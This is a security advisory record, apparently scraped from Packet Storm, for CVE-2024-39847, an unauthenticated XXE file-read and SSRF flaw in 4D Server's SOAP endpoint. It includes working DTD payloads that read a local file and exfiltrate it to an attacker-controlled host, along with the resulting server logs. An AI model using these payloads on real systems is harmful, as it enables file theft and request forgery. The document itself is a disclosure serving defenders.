{“lastseen”:”2026-05-18T20:00:05″,”description”:”Unauthenticated attackers can exploit a weakness in the XML parser functionality of the SOAP endpoints in 4D server. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to…”,”published”:”2026-05-18T00:00:00″,”modified”:”2026-05-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 4D Server Server-Side Request Forgery \/ Arbitrary File Read”,”source”:””,”references”:””,”id”:”PACKETSTORM:221283″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-39847″],”sourceData”:”—–BEGIN PGP SIGNED MESSAGE—–\\n Hash: SHA512\\n \\n Arbitrary File Read and Server Side Request Forgery via XML External \\n Entities in 4D Server\\n SOAP\\n ===============================================================================================\\n \\n Unauthenticated attackers can exploit a weakness in the XML parser \\n functionality of the\\n SOAP endpoints in 4D server. This allows them to obtain read access to \\n files on the\\n application server and adjacent network shares, and perform HTTP GET \\n requests to arbitrary\\n services.\\n \\n Metadata\\n ========\\n \\n – – Affected product: 4D Server\\n – – Affected version: v20 R3\\n – – Vendor: 4D\\n – – Problem type(s): CWE-611 Improper Restriction of XML External Entity \\n Reference\\n – – CVE ID: CVE-2024-39847\\n – – CVE URL: https:\/\/www.cve.org\/CVERecord?id=CVE-2024-39847\\n – – CVSS 4.0 score: 8.7\\n – – Advisory URL: https:\/\/www.schutzwerk.com\/en\/blog\/schutzwerk-sa-2024-002\/\\n \\n Details\\n =======\\n \\n During a recent external penetration test, an application based on the \\n 4D development\\n platform[0] was examined. 4D Server is a component of the 4D suite, and \\n acts as the\\n database and application server, serving mobile and desktop clients. \\n SCHUTZWERK identified\\n an arbitrary file read vulnerability via XML external entities in the \\n SOAP endpoint(s) of\\n 4D Server.\\n \\n Sending the following payload to the \/4DSOAP endpoint showed that the \\n application\\n processes external XML entities, as requests were observed on the attack \\n server:\\n \\n \\u003c!DOCTYPE foo [\\n \\u003c!ENTITY % test SYSTEM \\”http:\/\/attacker.tld\\”\\u003e\\n %test;\\n ]\\u003e\\n \\n After setting up a local 4D Server instance, SCHUTZWERK was able to \\n confirm that the\\n vulnerability is present in the latest version of 4D Server (20 R3 at \\n the time of\\n writing). Additionally, SCHUTZWERK found that the vulnerability is \\n exploitable even if\\n \\”Reject SOAP-Requests\\” is set in the 4D Server GUI.\\n \\n Further testing revealed that a combination of error-based and \\n out-of-band exfiltration\\n techniques can be utilized to read arbitrary files on the application \\n servers’ file system\\n and adjacent network shares, as well as performing HTTP requests to \\n arbitrary URLs. This\\n requires the use of a Document Type Definition (DTD) file loaded from an \\n attacker\\n controlled server, and can be demonstrated using the following payloads:\\n \\n Stage 1: XML body sent to the \/4DSOAP endpoint\\n \\n \\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\”?\\u003e\\n \\u003c!DOCTYPE foo [\\n \\u003c!ENTITY % stage1 SYSTEM \\”http:\/\/192.168.56.1:2121\/stage.dtd\\”\\u003e\\n %stage1;\\n ]\\u003e\\n \\n Stage 2: DTD file returned by http:\/\/192.168.56.1:2121\/stage.dtd\\n \\n \\u003c!ENTITY % fileb SYSTEM \\”file:\/\/\/c:\\\\Users\\\\john.doe\\\\Desktop\\\\secret.txt\\”\\u003e\\n \\u003c!ENTITY % eval \\”\\u003c!ENTITY \\u0026#x25; exfiltrate SYSTEM ‘%fileb;’\\u003e\\”\\u003e\\n %eval;\\n %exfiltrate;\\n \\n Server response for the request sent to the \/4DSOAP endpoint:\\n \\n \\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” ?\\u003e\\n \\u003cSOAP-ENV:Envelope \\n SOAP-ENV:encodingStyle=\\”http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\\” \\n xmlns:SOAP-ENV=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\” \\n xmlns:SOAP-ENC=\\”http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\\” \\n xmlns:xsd=\\”http:\/\/www.w3.org\/2001\/XMLSchema\\” \\n xmlns:xsi=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\”\\u003e\\n \\u003cSOAP-ENV:Body\\u003e\\n \\u003cSOAP-ENV:Fault\\u003e\\n \\u003cfaultcode\\u003eSOAP-ENV:Client\\u003c\/faultcode\\u003e\\n \\u003cfaultstring\\u003eerror at line 6, column 1: invalid \\n document structure\\n \\u003c\/faultstring\\u003e\\n \\u003c\/SOAP-ENV:Fault\\u003e\\n \\u003c\/SOAP-ENV:Body\\u003e\\n \\u003c\/SOAP-ENV:Envelope\\u003e\\n \\n Requests sent to the attacker controlled server (192.168.56.1:2121):\\n \\n 192.168.56.114 – – \\”GET \/stage.dtd HTTP\/1.1\\” 200 -\\n 192.168.56.114 – – \\”GET \\n \/my%20secret%20message%0D%0Ais%20super%20secret%0D%0Aand%20secure \\n HTTP\/1.1\\” 200 -\\n \\n Depending on the file contents, HTTP requests for the exfiltrate entity \\n may fail. On the\\n local test instance of 4D Server (which was set up by creating a new, \\n empty 4D application\\n project), this was the case when requesting files containing a hashtag \\n (#). In this case,\\n the file contents are instead returned as part of the \/4DSOAP endpoint’s \\n response message:\\n \\n \\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” ?\\u003e\\n \\u003cSOAP-ENV:Envelope \\n SOAP-ENV:encodingStyle=\\”http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\\” \\n xmlns:SOAP-ENV=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\” \\n xmlns:SOAP-ENC=\\”http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\\” \\n xmlns:xsd=\\”http:\/\/www.w3.org\/2001\/XMLSchema\\” \\n xmlns:xsi=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\”\\u003e\\n \\u003cSOAP-ENV:Body\\u003e\\n \\u003cSOAP-ENV:Fault\\u003e\\n \\u003cfaultcode\\u003eSOAP-ENV:Client\\u003c\/faultcode\\u003e\\n \\u003cfaultstring\\u003eerror at line 5, column 13: unable to open \\n external entity ‘http:\/\/192.168.56.1:2121\/# my secret website\\n – – http:\/secret.tld\/bar’\\n \\u003c\/faultstring\\u003e\\n \\u003c\/SOAP-ENV:Fault\\u003e\\n \\u003c\/SOAP-ENV:Body\\u003e\\n \\u003c\/SOAP-ENV:Envelope\\u003e\\n \\n For some file contents, exfiltration using these methods will not \\n succeed. However,\\n depending on the application, exfiltration could still be achieved \\n utilizing application\\n specific SOAP functions accepting data tags.\\n \\n The script 4d-xxe.py[1] was developed in order to aid in automated \\n exploitation. It\\n utilizes Flask[2] to start an exfiltration server on port 2121, and a \\n query endpoint on\\n port 1337. Once started, files can be requested by issuing a GET request to\\n \\n http:\/\/127.0.0.1:1337\/\\u003ctarget URI\\u003e\\n \\n which will send the appropriate XML payload to obtain the specified \\n resource:\\n \\n $ curl ‘127.0.0.1:1337\/http:\/\/192.168.56.114’\\n \\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” ?\\u003e\\n \\u003cSOAP-ENV:Envelope \\n SOAP-ENV:encodingStyle=\\”http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\\” \\n xmlns:SOAP-ENV=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\” \\n xmlns:SOAP-ENC=\\”http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\\” \\n xmlns:xsd=\\”http:\/\/www.w3.org\/2001\/XMLSchema\\” \\n xmlns:xsi=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\”\\u003e\\n \\u003cSOAP-ENV:Body\\u003e\\n \\u003cSOAP-ENV:Fault\\u003e\\n \\u003cfaultcode\\u003eSOAP-ENV:Client\\u003c\/faultcode\\u003e\\n \\u003cfaultstring\\u003eerror at line 5, column 13: unable to \\n connect socket for URL ‘http:\/\/192.168.56.1:2121\/\\u003c!DOCTYPE HTML PUBLIC \\n \\”-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\\” \\n \\”http:\/\/www.w3.org\/TR\/html4\/loose.dtd\\”\\u003e\\n \\n \\u003chtml\\u003e\\n […]\\n \\u003ctd class=\\”grayborder\\”\\u003e\\n \\u003ch2 align=\\”center\\”\\u003eWelcome to your 4D Web Server default home\\n page!\\u003c\/h2\\u003e\\n \\u003cp align=\\”center\\”\\u003eThis is the \\u003cstrong\\u003e\\u003cb\\u003e4D Web Server\\u003c\/b\\u003e\\u003c\/strong\\u003e\\n default home page. This \\u003cstrong\\u003etest page\\u003c\/strong\\u003e is served \\n by 4D\\n Application.\\u003c\/p\\u003e\\n \\u003cp align=\\”center\\”\\u003eIf you are the webmaster, congratulations! \\n Your Web\\n server is up and running. You are seeing this page because \\n you have\\n not yet replaced the default \\”index.html\\” file with \\n your actual\\n home page.\\u003c\/p\\u003e\\n \\u003cp align=\\”center\\”\\u003eInstructions for configuring your 4D Web\\n Server can be found in the included documentation.\\u003c\/p\\u003e\\n \\u003cp align=\\”center\\”\\u003e\\u003cb\\u003eIMPORTANT\\u003c\/b\\u003e: This Web page or Web site \\n is neither\\n owned nor administered by 4D SAS or any of its subsidiaries. \\n Please contact\\n the owner\/webmaster of this site to report any problems with \\n it.\\u003c\/p\\u003e\\n \\u003cp align=\\”center\\”\\u003e\\u0026copy;1995-2024 4D, Inc., 4D SAS and its \\n Licensors.\\u003cbr\\u003e\\n All rights reserved.\\u003c\/p\\u003e\\n \\u003c\/td\\u003e\\n […]\\n \\u003c\/html\\u003e\\n ‘\\n \\u003c\/faultstring\\u003e\\n \\u003c\/SOAP-ENV:Fault\\u003e\\n \\u003c\/SOAP-ENV:Body\\u003e\\n \\u003c\/SOAP-ENV:Envelope\\u003e\\n \\n This enables the use of any web directory enumeration tool to exfiltrate \\n files and\/or\\n perform \\”proxied\\” HTTP requests.\\n \\n Risk\\n ====\\n \\n An attacker can use the vulnerability to gather information and, \\n depending on the stored\\n data, exfiltrate secrets from the file system and adjacent SMB shares. \\n Furthermore, HTTP\\n requests can be used for out-of-band exfiltration and server-side \\n request forgery (SSRF)\\n attacks. Utilizing the SMB protocol could also lead to leakage of the \\n user’s NTLM or SSP\\n hash.\\n \\n Solution\/Mitigation\\n ===================\\n \\n Update to 4D Server 20 R7 or higher.\\n \\n Timeline\\n ========\\n \\n – – 2024-06-17 Vulnerability discovered\\n – – 2024-06-24 Attempt to contact vendor, no response received\\n – – 2024-06-25 CVE ID requested\\n – – 2024-06-29 CVE-2024-39847 assigned\\n – – 2024-07-04 Attempt to contact vendor again, no response received\\n – – 2024-07-09 Attempt to contact vendor again, no response received\\n – – 2024-07-16 Attempt to contact vendor again, no response received\\n – – 2024-07-22 Attempt to contact vendor again, no response received\\n – – 2026-04-29 Advisory published\\n \\n Credits\\n =======\\n \\n The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.\\n \\n Footnotes\\n =========\\n \\n [0] https:\/\/4d.com\\n [1] https:\/\/www.schutzwerk.com\/blog\/schutzwerk-sa-2024-002\/4d-xxe.py\\n [2] https:\/\/flask.palletsprojects.com\/en\/stable\/\\n —–BEGIN PGP SIGNATURE—–\\n \\n iQJOBAEBCgA4FiEEgLsg7Oj\/wY3LSF87GrXfkTIXLrsFAmnyGKIaHGFkdmlzb3Jp\\n ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrs6TQ\/\/Vp4Ts1sg8wUOx5V46ttU\\n OkErEUSrMqHDCrxiLKLsYoBBXyqPB+oKLzWFkMTUxbq+W7aqJIVG6EMeBsu1FCae\\n 0JfGA0MYYJ4s7WcphN\/QqqU+e35r0NfPAzcKlr861ZNcwcy9vbg\/WP+z1AlTfH9X\\n MBKtv4Z2R1xpFq2sAJnwOw3E7Cl5g40PSsTJhI52\/O7M4K5rB14EjFXW\/hHgSFNz\\n ESUI+o\/U1t7nPDulxfSsVmvbDTuvmxrs1xM\/ulMYoKFKSueEglNCmF+5i\/lFs7LF\\n rM0PZLGCbMR9z2NOeEk+dGwCztXpY2KN1KvPWYt4flvxZzlnWFWCzrVog8QdDhbV\\n CAfeLi+5krzgsZIPfphYpHc2BYJdAGsHDZx76GxoMNi8\/miHX15+vg3N7SBPopOG\\n aIWnPJX0LCoecdzELJhzpOSYpzLTurRKnPU6y4sa\/gJN4K99gCbE2HpPIJRaJmJG\\n hk7iwTUA11ijiEWpKCWX3hE3dhxY9WgKKoKe\/CtGZkaEoEa1ePTPUFWhiwORpSsa\\n AV3i7YZOgjBiEj4ffBfy+Z\/3fHhR7S3fWpFUhWeyb2jjx6OuJSG4g9az6Uze0hZG\\n vYn40CIpG2sHlm1PzQBzMUopqjmaW+FMyLgv8XOsnfdqg7UqPJ0LKmNAtafO1tVo\\n HH0qazSkyWNwZlaLr5YYUso=\\n =MhKk\\n —–END PGP SIGNATURE—–\\n \\n \\n — \\n SCHUTZWERK GmbH, Pfarrer-Wei\u00df-Weg 12, 89077 Ulm, Germany\\n Zertifiziert \/ Certified ISO 27001, 9001 and TISAX\\n \\n Phone +49 731 977 191 0\\n \\n advisories@schutzwerk.com \/ www.schutzwerk.com\\n \\n Gesch\u00e4ftsf\u00fchrer \/ Managing Directors:\\n Jakob Pietzka, Michael Sch\u00e4fer\\n \\n Amtsgericht Ulm \/ HRB 727391\\n Datenschutz \/ Data Protection www.schutzwerk.com\/datenschutz”,”sourceHref”:”https:\/\/packetstorm.news\/download\/221283″,”cvss”:{“score”:8.7,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:N\/SI:N\/VA:N\/SA:N\/AU:Y”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/221283\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-18T20:00:05″,”description”:”Unauthenticated attackers can exploit a weakness in the XML parser functionality of the SOAP endpoints in 4D server. This allows them to obtain read access…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-55365","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n